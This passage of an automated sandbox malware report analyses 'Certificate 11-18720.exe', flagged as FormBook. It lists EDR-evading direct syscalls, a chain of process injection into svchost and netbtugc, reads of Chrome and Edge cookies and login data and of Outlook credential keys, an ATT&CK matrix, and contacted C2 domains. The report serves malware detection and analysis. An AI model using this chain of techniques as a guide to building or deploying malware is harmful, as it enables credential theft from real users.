            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B0946 mov eax, dword ptr fs:[00000030h]1_2_038B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904940 mov eax, dword ptr fs:[00000030h]1_2_03904940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03856962 mov eax, dword ptr fs:[00000030h]1_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03856962 mov eax, dword ptr fs:[00000030h]1_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03856962 mov eax, dword ptr fs:[00000030h]1_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E mov eax, dword ptr fs:[00000030h]1_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E mov edx, dword ptr fs:[00000030h]1_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387096E mov eax, dword ptr fs:[00000030h]1_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D4978 mov eax, dword ptr fs:[00000030h]1_2_038D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D4978 mov eax, dword ptr fs:[00000030h]1_2_038D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC97C mov eax, dword ptr fs:[00000030h]1_2_038BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830887 mov eax, dword ptr fs:[00000030h]1_2_03830887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC89D mov eax, dword ptr fs:[00000030h]1_2_038BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E8C0 mov eax, dword ptr fs:[00000030h]1_2_0385E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039008C0 mov eax, dword ptr fs:[00000030h]1_2_039008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FA8E4 mov eax, dword ptr fs:[00000030h]1_2_038FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C8F9 mov eax, dword ptr fs:[00000030h]1_2_0386C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C8F9 mov eax, dword ptr fs:[00000030h]1_2_0386C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC810 mov eax, dword ptr fs:[00000030h]1_2_038BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]1_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]1_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]1_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852835 mov ecx, dword ptr fs:[00000030h]1_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852835 mov eax, dword ptr fs:[00000030h]1_2_03852835
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005FA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_005FA66C
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005E8189 SetUnhandledExceptionFilter,0_2_005E8189
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005E81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005E81AC

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtOpenKeyEx: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtQueryValueKey: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 3716Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B21008Jump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005FB106 LogonUserW,0_2_005FB106
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005C3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_005C3D19
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0060411C SendInput,keybd_event,0_2_0060411C
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_006074E7 mouse_event,0_2_006074E7
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Certificate 11-18720.exe"Jump to behavior
            Source: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005FA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_005FA66C
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_006071FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_006071FA
            Source: Certificate 11-18720.exe, AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000002.4135159406.00000000010B1000.00000002.00000001.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000000.1771036165.00000000010B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000002.4135159406.00000000010B1000.00000002.00000001.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000000.1771036165.00000000010B0000.00000002.00000001.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000000.1922189522.0000000000BF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: Certificate 11-18720.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
            Source: AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000002.4135159406.00000000010B1000.00000002.00000001.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000000.1771036165.00000000010B0000.00000002.00000001.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000000.1922189522.0000000000BF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000002.4135159406.00000000010B1000.00000002.00000001.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000000.1771036165.00000000010B0000.00000002.00000001.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000000.1922189522.0000000000BF0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005E65C4 cpuid 0_2_005E65C4
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0061091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_0061091D
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0063B340 GetUserNameW,0_2_0063B340
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005F1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_005F1E8E
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_005DDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005DDDC0

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4134816430.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4135693303.0000000000940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849387117.0000000000E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4137332421.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4134520381.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849178523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4135588115.0000000005950000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1850001201.0000000006D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Certificate 11-18720.exeBinary or memory string: WIN_81
            Source: Certificate 11-18720.exeBinary or memory string: WIN_XP
            Source: Certificate 11-18720.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
            Source: Certificate 11-18720.exeBinary or memory string: WIN_XPe
            Source: Certificate 11-18720.exeBinary or memory string: WIN_VISTA
            Source: Certificate 11-18720.exeBinary or memory string: WIN_7
            Source: Certificate 11-18720.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4134816430.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4135693303.0000000000940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849387117.0000000000E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4137332421.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4134520381.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849178523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4135588115.0000000005950000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1850001201.0000000006D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00618C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00618C4F
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0061923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0061923B

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562576 Sample: Certificate 11-18720.exe_ Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 28 www.joyesi.xyz 2->28 30 www.techchains.info 2->30 32 15 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 50 6 other signatures 2->50 10 Certificate 11-18720.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 AQvzsYASIFuMivlIGfCCjBw.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 AQvzsYASIFuMivlIGfCCjBw.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.rssnewscast.com 91.195.240.94, 49937, 49944, 49950 SEDO-ASDE Germany 22->34 36 elettrosistemista.zip 195.110.124.133, 50019, 50020, 50021 REGISTER-ASIT Italy 22->36 38 5 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

